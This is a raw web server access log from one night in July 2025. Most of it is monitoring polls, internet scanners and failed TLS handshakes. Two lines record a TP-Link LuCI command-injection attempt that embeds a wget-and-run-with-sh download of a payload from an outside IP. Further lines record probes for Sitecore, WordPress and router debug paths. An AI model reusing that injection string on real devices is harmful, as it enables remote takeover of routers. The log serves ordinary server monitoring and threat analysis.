87.121.84.212 - - [01/Jul/2025:21:59:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
160.30.44.120 - - [01/Jul/2025:22:01:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.233 - - [01/Jul/2025:22:03:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.96.233 - - [01/Jul/2025:22:04:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
95.214.53.84 - - [01/Jul/2025:22:04:53 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.179.227 - - [01/Jul/2025:22:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:22:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.199.118.129 - - [01/Jul/2025:22:07:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
45.156.130.47 - - [01/Jul/2025:22:07:55 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:09:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.209.185.139 - - [01/Jul/2025:22:17:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
134.209.185.139 - - [01/Jul/2025:22:17:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.84/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.233 - - [01/Jul/2025:22:19:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.134.233 - - [01/Jul/2025:22:21:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Jul/2025:22:24:15 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Jul/2025:22:24:18 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Jul/2025:22:25:12 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Jul/2025:22:26:56 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:27:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:27:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.84.212 - - [01/Jul/2025:22:27:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:22:28:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:28:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:22:28:56 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
79.124.58.198 - - [01/Jul/2025:22:29:12 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.51.183.15 - - [01/Jul/2025:22:30:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
79.124.58.198 - - [01/Jul/2025:22:30:53 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:22:33:26 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.34 - - [01/Jul/2025:22:37:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
87.121.84.34 - - [01/Jul/2025:22:37:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:22:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.205 - - [01/Jul/2025:22:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.247.32 - - [01/Jul/2025:22:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [01/Jul/2025:22:40:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
212.91.247.32 - - [01/Jul/2025:22:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:41:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
15.235.189.158 - - [01/Jul/2025:22:42:29 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
15.235.189.149 - - [01/Jul/2025:22:42:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
79.124.58.198 - - [01/Jul/2025:22:42:36 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:43:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.243.61 - - [01/Jul/2025:22:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.27.244 - - [01/Jul/2025:22:43:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:22:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:22:44:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:22:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.106.110.146 - - [01/Jul/2025:22:49:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.131.155.254 - - [01/Jul/2025:22:49:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:49:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:22:50:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:50:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
195.3.221.137 - - [01/Jul/2025:22:50:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [01/Jul/2025:22:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.42.231.140 - - [01/Jul/2025:22:52:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
89.42.231.140 - - [01/Jul/2025:22:52:43 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:22:56:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:56:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:22:56:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:22:56:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
139.99.35.33 - - [01/Jul/2025:22:57:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
212.91.247.32 - - [01/Jul/2025:22:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:22:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [01/Jul/2025:22:59:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
79.124.58.198 - - [01/Jul/2025:22:59:41 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:22:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.252 - - [01/Jul/2025:23:00:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [01/Jul/2025:23:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.42.231.140 - - [01/Jul/2025:23:01:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.42.231.140 - - [01/Jul/2025:23:03:24 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [01/Jul/2025:23:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
45.82.78.254 - - [01/Jul/2025:23:05:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.37"
212.91.247.32 - - [01/Jul/2025:23:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [01/Jul/2025:23:06:04 +0200] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0"
43.157.170.13 - - [01/Jul/2025:23:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:23:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.42.231.140 - - [01/Jul/2025:23:07:07 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
195.178.110.146 - - [01/Jul/2025:23:07:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
212.91.247.32 - - [01/Jul/2025:23:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.42.231.140 - - [01/Jul/2025:23:09:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:23:11:13 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
195.3.221.137 - - [01/Jul/2025:23:11:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [01/Jul/2025:23:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:23:13:06 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.14.32.6 - - [01/Jul/2025:23:15:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
89.42.231.140 - - [01/Jul/2025:23:15:22 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:23:18:07 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:23:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:23:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.101 - - [01/Jul/2025:23:20:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [01/Jul/2025:23:20:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
